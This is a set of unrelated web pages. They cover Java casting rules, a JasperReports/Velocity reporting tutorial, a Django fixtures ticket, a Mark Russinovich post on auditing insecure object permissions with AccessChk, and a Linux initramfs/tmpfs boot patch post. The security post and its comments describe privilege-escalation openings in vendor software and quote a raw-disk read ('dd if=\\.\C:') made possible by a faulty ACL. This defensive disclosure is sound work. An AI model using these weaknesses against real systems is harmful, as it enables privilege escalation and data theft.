from your explanation: -----------------------------------------------------------------. ----------------------------------------------------------------- I basically agree with this, save a few points. It is true that p is of type Point, and so it will remain for its entire lifetime.However I think that the reason that the statement: asc =(someClass[])(p) fails to compile has nothing to do with the true class of p. I say this because the resolution of the true class for p is a run time issue, not compile time. This will fail to compile because we are attempting to cast between an array and an object reference which is neither an array of compatible type nor of the class Object, the only legal ways for safe array casting. Think about this. Herbert Anonymous Ranch Hand Joined: Nov 22, 2008 Posts: 18944 posted May 24, 2000 13:06:00 0 FYI, a few basic rules to remeber Reference conversion and casting happen at both compile and run time. Conversion is up the inheritance tree. Casting is down inheritance tree. Apply common sence. Object Reference conversion ( at compile time) 1. interface oldtype may convert to newtype. if newtype is a superinterface of oldtype. 2. class oldtype may be converted to newtype. if newtype is a superclass of oldtype. 3. array oldtype may be converted to newtype. if both types are arrays contain object references and #2 above applies. Object Reference casting ( at compile time) 4. interface oldtype can always be cast to newtype. if newtype is a non-final object. 5. class oldtype may be cast to newtype. if newtype is a subclass of oldtype 6. array oldtype may be cast to newtype. if if both arrays contain object references and #5 above applies. * the class type for an object can NOT be determined at compile time. Object Reference casting ( at run time) 7. if newtype is a class. the newtype must inherit from oldtype. 8. if newtype is an interface. the class of the expression being implemented must implement newtype. Hope this clear up any outstanding issues. [This message has been edited by monty6 (edited May 24, 2000).] [This message has been edited by monty6 (edited May 24, 2000).] [This message has been edited by monty6 (edited May 24, 2000).] I agree. Here's the link: subject: casting between a ref type and an array. Similar Threads casting problem ArrayStoreException my notes on JLS for any1 who needs them !! Aren't Collection and AbstractMap peers? what's the common subclass? Conversion of object references All times are in JavaRanch time: GMT-6 in summer, GMT-7 in winter JForum | Paul Wheaton
http://www.coderanch.com/t/191566/java-programmer-SCJP/certification/casting-ref-type-array
CC-MAIN-2015-40
refinedweb
996
65.83
Opened 6 years ago Closed 5 years ago #14610 closed New feature (fixed) fixtures should be able to specify their database Description I have a product that has two databases, one is the member related database and the other is a 10gb static database. For performance reasons, I have to keep them separate and I have a database router which handles this. For testing purposes I need to load both databases for some of my function and view tests. The initial load of the test databases works correctly and I have two separate test databases, but when I specify fixtures in my TestCase, they all run against the default database, which causes the fixtures to fail to load. After spending the last 24 hours diving through the Django source code and talking to other developers, I cannot find a way to specify the database on which a fixture should load (when the 'syncdb' command is executed). This seems like a feature that should be build into fixtures (or the TestCase framework), otherwise developers can't test code that runs against multiple databases. My database setup is: DATABASES = { 'default': { 'NAME': 'matt', 'ENGINE': 'mysql', 'USER': 'myuser', 'PASSWORD': 'changeit', 'HOST': '' }, 'voters': { 'NAME': 'voters', 'ENGINE': 'mysql', 'USER': 'myuser', 'PASSWORD': 'changeit', 'HOST': '' } } Here is my simple router: from django.conf import settings class VotizenRouter(object): """A router to control all database operations on models in the myapp application""" def db_for_read(self, model, **hints): "Point all operations on myapp models to 'other'" if model._meta.app_label == 'verifier': return 'voters' return None def db_for_write(self, model, **hints): "Point all operations on myapp models to 'other'" if model._meta.app_label == 'verifier': return 'voters' return None def allow_relation(self, obj1, obj2, **hints): "Allow any relation if a model in myapp is involved" if obj1._meta.app_label == 'verifier' or obj2._meta.app_label == 'verifier': return True return None def allow_syncdb(self, db, model): "Make sure the myapp app only appears on the 'other' db" if db == 'voters': return model._meta.app_label == 'verifier' elif model._meta.app_label == 'verifier': return False return None The 'db' should be 'voters' when the 'app_label' of the model is 'verifier'. Since the fixture loading logic has the database set to 'default' it fails to load the fixture. For testing purposes I rewrote the 'allow_syncdb' function to always return None and as expected Django attempted to write the fixtures to the 'default' databases, instead of the one specified by the router. Change History (5) comment:1 Changed 6 years ago by comment:2 Changed 6 years ago by comment:3 Changed 5 years ago by Any updates on this? comment:4 Changed 5 years ago by According to the docs, this feature already exists (in 1.3) Database-specific fixtures If you are in a multi-database setup, you may have fixture data that you want to load onto one database, but not onto another. In this situation, you can add database identifier into . If your DATABASES setting has a 'master' database defined, you can define the fixture mydata.master.json or mydata.master.json.gz. This fixture will only be loaded if you have specified that you want to load data onto the master database. So it would seem that the syntax is already prescribed for multi-db fixtures. However, from my experience this does not work correctly, or at least always. I found this looking for an existing bug report before submitting one. However it is in here as a feature request and I do not feel qualified to change it to a bug. comment:5 Changed 5 years ago by Indeed, the problem originally described here is fixed. If you find a bug, please open a separate ticket, and provide enough information for someone else to reproduce the problem. Sounds like a reasonable idea to me. Can you propose a syntax for fixtures to specify DB? P.S. You don't actually need to explicitly "return None", function which is not returning anything is returning None anyway.
https://code.djangoproject.com/ticket/14610
CC-MAIN-2016-50
refinedweb
662
51.58
Mark Russinovich’s technical blog covering topics such as Windows troubleshooting, technologies and security.: accesschk everyone -pwu *Named Objects: accesschk everyone -owu \basenamedobjectsServices: accesschk everyone -cwu * I ran similar commands looking for write access from the Authenticated Users and Users groups. An output line, which looks like “RW C:\Program Files\Vendor”, reveals a probable security flaw. To my surprise and dismay, I found security holes in several namespaces. The security settings on one application’s global synchronization and memory mapping objects, as well as on its installation directory, allow unprivileged users to effectively shut off the application, corrupt its configuration files, and replace its executables to elevate to Local System privileges. What application has such grossly insecure permissions? Ironically, that of a top-tier security vendor. For instance, AccessChk showed output that indicated the Users group has write access to the application’s configuration directory (note that names have been changed): RW C:\Program Files\SecurityVendor\Config\RW C:\Program Files\ SecurityVendor\Config\scanmaster.dbRW C:\Program Files\ SecurityVendor\Config\realtimemaster.db… Because Malware would run in the Users group, it could modify the configuration data or create its own version and prevent the security software from changing it. It could also watch for dynamic updates to the files and reset their contents. For the object namespace, it reported output lines like this: RW [Section] \basenamedobjects\12345678-abcd-1234-cdef-123456789abcRW [Mutant] \basenamedobjects\87654321-cdab-3124-efcd-6789abc12345… I executed handle searches in Process Explorer to determine which processes had these objects open and it reported those of the security software. Sections represent shared memory so it was likely that the security agent, running in user login sessions, was using it to communicate data to the security software’s service process that was running in the Local System account. Malware could therefore modify the contents of the memory, possibly triggering a bug in the service to that might allow the malware to obtain administrative rights. At the minimum it could manipulate the data to foil the communication. “Mutant” is the internal name for Windows mutexes, and the security software’s service was using the mutex for synchronization. That means that malware could acquire the mutex and block forward progress by the service. There were more than few of these objects with wide-open security that could potentially be used to compromise or disable the security software. In the wake of my discovery, I analyzed the rest of my systems, as well as trial versions of other popular security, game, ISP and consumer applications. A number of the most popular in each category had problems similar to those of the security software installed on my development system. I felt like I was shining a flashlight under a house and finding rotten beams where I had assumed there was a sturdy foundation. The security research community has focused its efforts uncovering local elevations via buffer overflows and unverified parameters, but has completely overlooked these obvious problems – problems often caused by the software of security ISVs, or in some cases, their own. Why are these holes created? I can only speculate, but because allowing unprivileged groups write-access to global objects requires explicit override of secure defaults, my guess is that they are common in software that was originally written for Windows 9x or assumed a single administrative user. When faced with permissions issues that crop up when migrating to a version of Windows with security, or that occur when their software is run by standard user accounts, the software developers have taken the easy way out and essentially turned off security. Regardless of the reason, it’s time for software vendors – especially those of security applications - to secure their software. If you discover insecure software on your system please file a bug with the publisher, and if you are a software developer please follow the guidance in "Writing Secure Code,” by Michael Howard and David LeBlanc. Did you only find flawed security models in third party applications or was there numerous findings in the baseline OS? I work in infrastructure for a software developer, so I'll be passing this along for consideration. Thanks as always Thanks for the tool. I found a potential problem in a couple of minutes. I get lots of output for Objects on 32-bit XP, but 0 for 64-bit XP, no matter what user or group I try. Objects not working on 64-bit? PingBack from PingBack from D'Oh, this is about how much news? Some year-old examples: Security software from G-Data gives Everyone-FullAccess on its install directory and some registry keys. WebDrive, FTPDrive and Novell NetDrive set NULL DACLs on their service and driver. The NVidia ForceWare Driver gives Everyone-FullAccess on some keys in HKLM\SYSTEM which allows a user to DoS the system by writing garbage there. Additionally, the control panel uses a shared section for no good reason. DeviceLock, at least until version 5.76.1, gave Everyone-FullAccess on \Device\HarddiskX objects if the access list contained as least one allow entry (and other totally removed any access, even to administrators). Hurray for "dd if=\\.\C:"! I could list many more examples... @rivet: Of course in the baseline OS there are only miniscule violations, f.e. some Full and Create access in some HKCR\CLSID\{CLSID}, but nothing serious. Microsoft isn't dumb. > I get lots of output for Objects on 32-bit XP, but 0 for 64-bit XP, no matter what user or group I try. Objects not working on 64-bit? That's a bug that shows up only on 64-bit XP. I'll be posting an update in the next few days that addresses it. I think that third party software not cause most of Windows crashes, but also creates very many security flaws. For example a driver creating device object (for example meant for interface with service) accessible to everyone can be very dangerous. WTF? 3 out of 8 comments are the PingBack SPAM. Why doesn't Technet setup a filter that filters this SPAM? It's trivial to identify. What Mark has pointed out is quite a general practice for many companies that need to migrate their software to the new OS. The developers do really go easy way in the most cases. However, that is so not because we're lazy, but mostly because there're at least too reasons for that, as to my experience: 1. The companies do not wish to involve much budget into support of a new OS version and push hard to make the software run with the same experience (as on the previous OS version) in a short time frame. The marketing and top management people are naturally interested in implementation of new competitive features rather than in investment of grinding/tuning existing functionality which might become broken by an up-coming OS but maybe quickly "healed" in the way described by Mark. 2. The companies are forced (for some or another reason) to support previous versions of OS, at least those that are still in support from Microsoft. IMHO, Vista is great about many new things in many areas. As a sys-engineer/architect and developer (by spirit), I would certainly love to re-design the software in my abode to use Vista's features and style, dropping out not modern and aged things. Yet, to meat high level goals, the interests of the company does not always coincide with my wishes. These are not complains, just my view on things, and having said all of that, I think Microsoft still tries to do a good job of forcing apps to be compliant to new OS version by running misc Logo programs. But I'd like to say that the "Certified for Vista" test cases do not mention such/similar checks for the software as Mark describes, even though it enforces such details as manifests, code signatures, etc. I'm not sure what rules "Designed for Vista" Logo program imposes - I did not work with that, but it might be worthwhile to update the Logo programs with Mark's prescriptions. IMHO, it will promptly force the companies to resolve the mentioned holes in their software, because logo-compliance is a matter of business, making the top management take it into account. P.S. I don't belong to any security software companies. Dear Mark! This is a little Off-Topic but since I do net receive any response when writing to you an e-mail, I'll try this way. I experienced a nasty bug in the command line tool handle - which is in my case more useful than Process Explorer. The bug is reproducible on every Windows XP System. Try to open a txt file with excel. Excel will create you several *.tmp files in your %temp% directory. These files are called something like 37.tmp ore 74.tmp. Now as long as excel is opened there is a handle on that files. Process Explorer recognizes that handle. Handle.exe also recognizes it as long as you call it from inside the directory, or use the 8.3 folder names. If you use the full folder names with (with "" of course) then it won't recognize the handle. So at first I thought: It might be because of the spaces in the folder name "Local Settings". But that's not the case. Create another file in the same directory (even with the same/similar filename), and open it with a process that puts a handle on it. Now check that file with handle.exe and it works, no matter which way you try it. So it has to do something with the way excel opens the file, and the path using spaces or something? Anyways, it would be great if that would be fixed. Wouldn't it be worth a small investigation, and a blog entry ;-) I love these articles, even though I have little interest in Windows; it's the technical, investigative techniques that makes for compelling reading. Thank you! Thanks for the feedback, Jody! You rock Mark. This article cracked me up because I'm a bit frustrated with the AV companies with petty complaints about ASLR and whatnot. Bottom line: Application Developers everywhere need to go back to school. When doing research for a project on improvements in Trustworthy Computing, SDLC, Vista, and just hanging out on your site, Channel9, & IT Showtime I've really appreciated how you all are handling business. Bottom line: It's nice that an hour of your research leads to 1000's of hours of training and development for those who need to get with the times. That just goes to show how 3rd party app developers never used their 3 years of Vista CTP builds to their advantage A common reason for lowering security on the Program Files folder for an app is that the app creates data files in that location, and limited users can't create files there so.... The reason often seems to be sheer laziness. It's too easy to use files ("myfile.txt") without any folder name, instead of a proper location with a CSIDL and too much trouble to change the app. I think the problem is plain and simply that the security model is too complex and hard to use effectively without just disabling it. For example I worked on an app that had to use secure registry keys, and it was a real bitch doing stuff that was even moderatly more complicated than the examples you could find on MSDN. Even there the pickings were slim, with useless or buggy example code, and the like. If the security model is complex, requires a lot of knowledge and use of complex apis and interfaces and is poorly documented on top then its hardly a surprise that people mess it up so regularly. If MS wants to improve the general security of their ecosystem then they really need to expose simpler API's and provide MUCH better documentation. Every example that has possible security implications should be coded securely, and be extremely clear in how the security aspects work. People cut and paste code and then go from there, maybe they shouldn't but they do, especially when working on new material, and if the examples are crap, well then thats what gets rolled out. Ive seen this elsewhere, just by updating sample code in a scripting languages documentation to use "best practices" resulted in a general improvement of the whole ecosystem.
http://blogs.technet.com/b/markrussinovich/archive/2007/06/19/1256677.aspx?PageIndex=2
CC-MAIN-2015-22
refinedweb
2,098
52.49
Introduction JasperReports is an open-source report engine that is being used by many organizations that need to generate business data reports. Having the ability to generate reports on business data is crucial since the organization uses these reports to make effective decisions. People that use these reports often have different roles and analyze different portions of the data. For instance, a customer report that shows the name, address, age, email, and number of orders for each customer might be useful for a certain group of people while others prefer having a customer report that shows only the age and the number of orders for each customer. In other words, different roles within an organization need different report views. To generate different views of a JasperReports report using, you need to understand how reports are generated. JasperReports uses an XML document that defines the report design. You use this template file to provide the reporting engine with the information it needs to create the report. In this template file you specify the SQL query, title of the report, images to include, text for the page headers, columns that should be shown, and the database fields that make up the column definitions. For instance, a location column in a JasperReports report could be composed of two database fields: city and state. If there is a need to show different columns of a report depending on a criteria such as user selections, it can be accomplished in several ways. One programming approach would be to create an XML template file for each possible combination of columns. Then based on the columns the user wants to see, the application will select the corresponding XML template to generate the corresponding report view. This approach is technically possible but counterproductive since the only difference among these XML templates is the section that specifies the columns to show. A different alternative is to load the XML template into memory and then use an XML library, such as JDOM, to perform changes to the XML document based on the user selections. The application would add/remove the column definitions from the in-memory XML template. This approach is also technically possible. But managing the XML structure of the template can turn into a nightmare. A third option is to use the JasperReports design API that is part of the JasperReports library. Instead of using an XML file to specify your report design, you use the JasperDesign class in conjunction with other classes found in the net.sf.jasperreports.engine.design package to specify the properties of your report. Building a report design with this set of classes is similar to the process of building a set of windows and its widgets using the Swing API. First you create the JasperDesign object and then start putting the pieces together that makes up the complete report. This is a flexible approach, but the extra code and associated maintenance issues can turn into a problem later on. The most practical option is to generate the XML template at run-time using a Java™-based templating engine. This approach requires you to write a templating file that contains the definition of the XML template. In this templating file, "placeholders" are assigned to the data that cannot be computed at compilation time. This programming approach is used if different report views are required, and the user will decide what columns they would like to see at run-time. The templating engine we chose to use is Velocity V1.4. Velocity is an open-source Java-based templating engine that has gained popularity for its ease of use and abundance of documentation. This article explains how to generate a JasperReports XML template from a templating file. As an aid to readers, a sample Web application is provided as a case study. This Web application uses JasperReports to generate a customer report for a fictitious company named XYZ. A customer report for company XYZ includes data such as name, email, number of orders, location, and age. When this sample application is started, the user is given a page that lets them select what columns they want to include in the report. Users can personalize the customer report by choosing the view (for example, the columns) they are interested in seeing. The sample application can also generate an order report for company XYZ. An order report for company XYZ includes order id, order status, placement method (phone, fax, online), name of the customer who placed the order, and customer's email. Users can also choose the columns they would like to include in an order report. Both of these reports are generated from the same templating file. The properties that make each report unique are injected into the JasperReports XML template via the Velocity templating engine. You will import the sample application into IBM® Rational® Application Developer V6 and deploy it to a WebSphere® Application Server V5.1 test instance. DB2® UDB V8.2 is used as the enterprise data repository. A SQL script file is provided to create and populate the database tables that are needed by the application. Assumptions You should have a working knowledge (but not necessarily mastery) of XML, HTML, SQL, Velocity, and JasperReports. You should be familiar with Rational Application Developer and the. If you need introductory information to any of these technologies, please see the Resources section. Install the sample Web application To install the sample application, you need to download and unzip the companion ZIP file (see the Download section). Two files are included in this ZIP file: create-db.sql and JReportsEAR.ear (as well as two XML files we will use later). Before you can run the Web application, you need to create and populate a DB2 database named reportdb. To create this database, run the create-db.sql file. Use the following command to run create-db.sql: db2 -svtf create-db.sql The file JReportsEAR.ear contains the sample Web application. Import JReportsEAR.ear into your Rational Application Developer workspace, using the default options. A new Web project named JReportsWEB should appear in your workspace. In the WebContent/WEB-INF/lib folder of this project, you should see all the JAR files required to run the Web application (see Figure 1). This article uses JasperReports V0.6.5 -- for information on other versions, see the JasperReports home page. If you would like to know more about the dependencies JasperReports has, click on requirements on the left navigation bar of the JasperReports home page. Figure 1. Project Explorer view in Rational Application Developer after importing sample application. After importing the application, you should configure a DB2 UDB datasource for the WebSphere Application Server v5.1 test instance where you will run the sample application. Specify jdbc/reportDB as the JNDI name and reportdb as the database name in the definition for the datasource -- otherwise the application won't find the datasource and will not run. Now you can deploy the sample application to your test server instance and start it. Once the test server instance is up and running, right-click on the JReportsWEB project and select Run => Run on Server. An HTML page named customer-report.html will open. This page shows all the columns that can be included in a customer report for company XYZ (see Figure 2) with a check box next to each column. To include a column in the report, the user selects that checkbox. To test this feature, select columns you want to include in the report and click Generate Report. A new browser window will open showing the customized customer report. The report containing only those columns that were selected. Figure 2. User can select one or more columns to include in a customer report. If all columns are selected, the report shown in Figure 3 should be generated. Figure 3. View of a customer report if all columns were selected. As mentioned earlier, the sample application can also generate order reports. To generate an order report, right click on the order-report.html file that is found under the WebContent folder of the JReportsWEB application, and then select Run => Run on Server. Figure 4 shows the page that should be loaded into the browser. Figure 4. User can select one or more columns to include in an order report. If all columns are selected, then the report shown in Figure 5 should be generated. Figure 5. View of an order report if all columns were selected. Overview of JasperReports and Velocity Nowadays, generating Web reports from business data is a common requirement for many applications. To address this requirement, software development teams will either write their own code to generate reports, buy a commercial reporting product such as Crystal Reports, or use one of the open-source reporting engines. JasperReports is one of the most popular options for open-source reporting. It is a Java reporting engine tool that uses XML templates to generate reports that can be delivered onto the screen, to the printer, or output to PDF, HTML, XLS, CSV, and XML. If you are new to JasperReports, you might do a Web search for introductory articles on this subject. We recommend the developerWorks article titled "Generating online reports using JasperReports and WebSphere Studio." Although JasperReports provides a great degree of flexibility in creating reports, the use of a static XML template limits the flexibility of the content as well as aspects of the overall design. Therefore you need a technology that can manipulate the XML template file at runtime in order to change the reports dynamically. Velocity is a Java-based template engine that allows processing of text documents and generation of dynamic content using a simple template language called VTL (Velocity Template Language). Although the growing popularity for Velocity can be attributed to its use in J2EE applications and the MVC design pattern, this technology can also be applied in other programming areas. One such application is to use Velocity to generate the XML templates used by the JasperReports engine. With Velocity you can create a templating file (also known as the VTL template) and abstract the dynamic elements. Through the use of references and directives defined by the Velocity Template Language, you can access public methods of Java objects and incorporate the result of those method invocations into the VTL template file. Understanding Velocity is out of the scope of this article, so please look at the Resources section below for more information. Merging JasperReports with Velocity The most common way to generate reports with JasperReports requires the creation of an XML template that serves as the design for your report. Since Velocity can manipulate the content of XML documents, merging the two technologies requires the changing the XML template used by the JasperReports engine. The VTL template will contain the structure of a JasperReports XML template along with VTL expressions spread throughout the different sections of the document. The first VTL construct found in our sample templating file is used to specify the SQL query string of the report. Although we could have specified the SQL query with a JasperReports parameter, we decided to use a Velocity reference to allow for a more flexible design in our sample application and also to introduce the concept with a simple example. The XML code looks as follows: <queryString> <![CDATA[$sql]]> </queryString> Notice that an expression of the Velocity Template Language is used in conjunction with JasperReports XML template elements in order to create our VTL template. Once the VTL template is parsed by the Velocity engine, the $sql reference will be replaced by the corresponding string value. So far we have not shown how the use of Velocity can help generate dynamic reports since we could have also used a JasperReports parameter to provide the SQL query. The VTL directives that are used throughout the remaining sections of the VTL template provide the real value of using Velocity to produce the XML template file. The following piece of code demonstrates how to take advantage of the looping directive to dynamically generate the fields section of the report. #foreach ($field in $fieldList) <field name="$field.name" class="$field.clazzName"></field> #end Once the VTL template is parsed, only fields that have been added to the Velocity context will make it to the resulting XML template file. This gives you a great flexibility in selecting the fields you need at runtime. Another section of the JasperReports XML template that needs to be generated dynamically is the column header. <columnHeader> <band height="20"> #set( $x = 0 ) #foreach ($column in $columnList) <staticText> <reportElement mode="Opaque" x="$x" y="5" width="$column.width" height="15" forecolor="#ffffff" backcolor="#bbbbbb" /> <textElement textAlignment="Left"> <font reportFont="Arial_Bold" /> </textElement> <text> <![CDATA[$column.name]]> </text> </staticText> #set( $x = $x + $column.width ) #end </band> </columnHeader> In order to specify at run time what columns should be included in the final report, we needed to add the column names to the column header section dynamically using the VTL looping directive. Since we are relying on a Velocity reference, only the columns that are added to the data context will make it to the JasperReports XML template. Along with the column name, you also specify the horizontal position of the data inside each column. Since the #set directive allows for mathematical expressions, we use it to keep track of the horizontal position that corresponds to each subsequent column. Now that we saw how to dynamically generate the column header section, let us take a look at how we assemble the details section of the XML template. #set( $x = 0 ) #foreach ($column in $columnList) <textField> <reportElement x="$x" y="4" width="$column.width" height="15" /> <textElement textAlignment="$column.alignment" /> <textFieldExpression class="$column.clazzType"> <![CDATA[$column.expression]]> </textFieldExpression> </textField> #set( $x = $x + $column.width ) #end Generating the detail section of the XML template is analogous to generating the column header section. Basically you use the same directives already explained without taking away the flexibility that JasperReports offers in the process. One of JasperReports's most attractive features is that it allows you to create an expression where you can combine fields from the data source with your own text and show the result of this expression as a single column during the report generation. It is critical not to lose the flexibility provided by these expressions. Therefore, it is important to associate each column to be displayed in the report with a JasperReports text field expression. In our sample templating file, the text field expression can be obtained by using the $column.expression property. Since the $column.expression property should represent a JasperReports text field expression, we need to make sure that it follows the rules and format of such elements. For example, to make a reference to a field, we put the field name between the $F{} character sequence. Although there are other areas in the templating file where VTL constructs are used, one particular set of directives should be discussed here. When Velocity finds the "$" character in front of another character or word, it checks to see if there is a corresponding value in the Velocity context. If the reference can't be found, the correct behavior is to output the characters as shown in the templating file. However, when we started working with Velocity to generate JasperReports XML templates, we found out that we could not use the syntax for JasperReports' parameters freely. When Velocity parses a VTL template file that contains a JasperReports parameter expression, the $P{} character sequence is processed incorrectly and produces an invalid JasperReports XML template. To avoid this integration problem, we created a VTL reference and assigned it a value equal to the string representing the JasperReports parameter we wanted to use. This can be seen in the following snippet of code: <title> #set( $baseDir = '$P{BaseDir}' ) #set( $title = '$P{Title}' ) #set( $imageFile = '$P{ImageFile}' ) ... </title> Let's shift our focus from the VTL template file to the Java code used to merge the two technologies. For the most part, using Velocity as a templating tool to produce the JasperReports XML template file does not require a lot of extra code. The only issue to address during the integration of both technologies is the connection of streams. Although it is technically possible to generate the XML template file into the file system and use JasperReports's API to read the file back from the file system, this approach will severely impact application performance. A better approach is to use Velocity's template object to generate the XML template file and pass the output straight to the JasperReports's compiler manager for processing. This concept is show in Figure 6. Figure 6. I/O stream connection between Velocity and JasperReports. Since Velocity uses character streams as the output mechanism, this output needs to be converted into a byte stream to make it compatible with the JasperReports input mechanism. Also, the JasperReports compiler manager must read data as soon as the character output stream used by template object has data available. For that reason, we decided to use piped input and output streams to transfer the data between the Velocity engine and the JasperReports compiler. The following code snippet shows how this is done. Template template; Context context; PipedInputStream inStream; BufferedWriter writer; Thread thread; TemplateCompiler compiler; ... try { PipedOutputStream outStream = new PipedOutputStream(); writer = new BufferedWriter(new, OutputStreamWriter(outStream)); // Connect input stream to output stream inStream = new PipedInputStream(outStream); compiler = new TemplateCompiler(inStream); thread = new Thread(compiler); thread.start(); template.merge(context, writer); } catch (Exception e) { throw e; } finally { if (writer != null) { writer.flush(); writer.close(); } } // Wait for thread to finish executing thread.join(); // Get compiled report return (compiler.getJasperReport()); The character output stream being sent as a parameter to the merge() method of the Template instance is actually directing the output to a PipedOutputStream object. This output stream is then connected to the piped input stream instance used by the JasperReports's compiler manager. Since we are using piped streams, we need to read and write the data in different threads. Otherwise, there could be a deadlock in our application. Once assembling the chain of streams is completed, parsing of the VTL template begins and a separate thread is spawn. This thread is responsible for calling the compileReport() method of the JasperCompileManager class, which uses the output of the Velocity engine as its input. When the Velocity's template object finishes its processing, we have to wait until the thread that is responsible for compiling the XML template completes as well. After the processing is complete, we can get the JasperReports instance from the compiler manager and start using it for the generation of reports. Now that we have an understanding on how JasperReports and Velocity can work together, let's look at the sample application. Basic framework to generate JasperReports XML templates at run time The sample application contains a basic framework for generating JasperReports XML templates from a VTL template. This section will focus on this framework and how it is used by the application. This framework could be extracted, modified, and used in any other application that has the need to generate JasperReports XML templates dynamically. After reading this section, you should have an understanding of what would be required if there is a need to add a new type of report to the sample application. The design of this framework assumes that, in most cases, reports generated by a particular business organization follow a common structure regardless of the type of report (for example, customer report vs. order report) or the view of the report (for example, columns that should be included). Our definition of report structure is the layout of the different sections that makes up a complete report. In the sample application, all types of reports have the following structure or layout: a title, an image next to the title, a page header, a column header (column names), the retrieved data, a page footer that specifies the page number, and a report summary that states how many records are found in the report. In this framework, the layout of these sections is not configurable. This means that these sections will always appear in the report and their location is fixed. However, the framework allows configuring the data that will be shown in these sections. The configurable data that is inserted into the different sections of the JasperReports XML template is obtained from an XML configuration file that exists for each type of report. For the sample application, we created two of these configuration files: customer-report.xml (for the customer report) and order-report.xml (for the order report). These files are included in the zip file download. If there was a requirement to add a third type of report to the application, then a new XML configuration file should be created for it. A description of the elements of the XML configuration file is included below: - Root element of the document. - name - Name of the report. It is used to associate a unique name with the set of properties defined in the document (think of the name as being a key and the set of properties as being the value associated with that name). - title - Title that should be shown in the report. - image - Filename of the image that should be shown next to the title. All image files are placed in the WebContent/images folder of the Web application. - header - Text that should be shown as a page header on every page. - sql - SQL query to retrieve the report data from the data source. - fields - Specifies the JasperReports data field definitions that can be included in the JasperReports XML template (data fields store values retrieved from the data source). Notice that each possible field that the report could show should be listed in this section. A name and a Java class type describe each field. As required by the JasperReports engine, each one of these fields must appear in the select clause of the SQL query and the Java class type must be compatible with the data retrieved from the data source (see the quick reference section on the JasperReports Web site for a list of the possible class types). - columns - Specifies the column definitions that can be included in the report. Each possible column that the report could show should be listed in this section. A name, a width, an alignment, a JasperReports text field expression, and a Java class type describe a column. The name is what appears in the column header; the width must be specified in pixels. Valid values for alignment are Left, Center, Right, or Justified. The JasperReports text field expression specifies what fields are used to populate the column. The Java class type specifies the class type that should be applied to the text field expression. See the quick reference section on the JasperReports Web site for a list of the possible class types for field expressions. The properties defined in each XML configuration file are loaded into memory when the web application is started. A servlet named ReportServlet receives as an initialization parameter (reports.properties) the names of the XML configuration files that should be loaded at startup (see Figure 7). Figure 7. XML configuration filenames are passed in as a servlet initialization parameter. To help you understand how the data in the configuration file is used, here's a description of the events that occur when a user submits a request. Assume that the user is interested in generating a customer report using the customer-report.html page. When the user's request to generate a report is received, the application uses the value of a hidden HTTP field to determine the configuration information. The value of this hidden field must match the value of the name element in the XML configuration file. If you take a look at the customer-report.xml file, you will see that the value for the name element is 'Customer Report,' which matches the value of the hidden field in the HTML page. Therefore, when a request to generate a report is sent from the customer-report.html page, the application uses the configuration information contained in the customer-report.xml file. The configuration information is queried to obtain the SQL query, title, image filename, header string, and definitions of the columns and fields to include in the report. To determine what columns should be included in the report, the application uses the value of an HTTP parameter named columns. The value of this HTTP parameter depends on which columns a user selects. To specify which columns to include in a customer report, the user selects the checkboxes shown on the customer-report.html page (see Figure 2). Each one of these checkboxes is associated with a column name that must be found among the names that appear in the columns section of the customer-report.xml file. Once the application knows what columns should be included in the report, it queries the configuration information to obtain the definitions of those columns only. The field definitions that are extracted from the configuration information also depend on the columns the user selected. Only those fields that are required to populate the columns that were selected are extracted. For instance, if a user selects to see only the name, location, and number of orders columns, then the email and age fields are not extracted since these fields are not required to populate the name, location or number of orders columns. The SQL query, title, header string, columns and field definitions extracted from the configuration file are placed in the Velocity context. After the Velocity context is populated, the templating engine generates the JasperReports XML template, which is then passed to the JasperReports compiler. The only piece of data extracted from the configuration file that is not placed in the Velocity context is the filename of the image. Instead, the image filename is passed as a JasperReports parameter to the JasperReports engine. Once the JasperReports XML template is compiled, the report is ready to be filled with data from the data source. At this point, the engine uses the SQL query in the template to query the data source and generate the report. If you wanted to add a new type of report to the sample application, you would only need to create an XML configuration file and then an interface so users can select the columns they would like to include in the report. Also, the name of this XML configuration file would have to be passed to the ReportServlet (see Figure 7) so the configuration information is loaded at startup and made available to the application. Notice that you could go a step further and instead of generating the interface manually like we did, you could extend the framework so that the interface is generated from the data in the XML configuration file. This approach should be straightforward -- use Velocity to generate the HTML content of the interface, and then the only steps to add a new type of report are creating the XML configuration file and passing the name of this file to the ReportServlet. Conclusion A sample Web application was used as a case study in this article to explain how an application could generate dynamically JasperReports XML templates using the Velocity templating engine. By generating the JasperReports XML template at run time, applications can generate reports that can be tailored based on the user input. To aid in the generation of the XML template, a basic framework was developed. When designing the framework, we made the assumption that reports generated by a particular business organization have a similar structure or layout. This framework could be extracted from the sample application and extended according to your own project's needs. Download Resources - Generating online reports using JasperReports and WebSphere Studio - The Apache Jakarta Project Velocity - Start up the Velocity Template Engine - JasperReports Home Page - JasperReports API - Get involved in the developerWorks community by participating in developerWorks blogs. - Browse for books on these and other technical topics. - Find out more about WebSphere Studio Application.
http://www.ibm.com/developerworks/websphere/library/techarticles/0505_olivieri/0505_olivieri.html
CC-MAIN-2014-52
refinedweb
4,704
52.7
I toyed with setting up a diskless system in initramfs. In the process, Icame across some things:1) There is no way to have the kernel not mount a filesystem, unless you use /init or rdinit=.1a) In the process of writing these patches, I found prepare_namespace not to be called if /init is present. prepare_namespace will call security_sb_post_mountroot after mounting the root fs. I did not yet see a way to call this from /init, and grepping kinit for "security" did not help, too. This is probably a bug, but using the features of this patchset, you'll avoid hitting it. Therefore this patchset does nothing about that.2) If you want to use tmpfs, you need a script which essentially duplicates the work the kernel just did: Mount the root fs, unpack or move the files. Using tmpfs instead for the first root mount is as cheap as using ramfs, as long as tmpfs is used anyway (and most likely it is).2a) I figured if you prepared the root fs to contain a running system, you woud probably also set up a runnable system on it. Therefore I changed the default to boot from tmpfs if there was no /init nor a root= option. (If there is a /init, it will be executed as usural.) Unfortunately the way I do it, this will override the rdev setting, but that should be OK, since rdev is dead. Isn't it?3) While I was at it, I figured I would not need most of the init/mount* code anymore. Therefore I made patch 3, which ifdefs it out as far as possible while still aiming for a small change.Patch 1 adds the capability to use root=rootfs.Patch 2 adds the capability to use tmpfs for root, default root=rootfs. ramfs becomes optional if rootfs=tmpfs.Patch 3 allows to remove the capability of automounting filesystems.All patches appyl to 2.6.22.1-- Fun things to slip into your budgetRemuneration compensation upgrade. (otherwise called a pay raise).-To unsubscribe from this list: send the line "unsubscribe linux-kernel" inthe body of a message to majordomo@vger.kernel.orgMore majordomo info at read the FAQ at
https://lkml.org/lkml/2007/7/13/350
CC-MAIN-2015-22
refinedweb
369
73.78
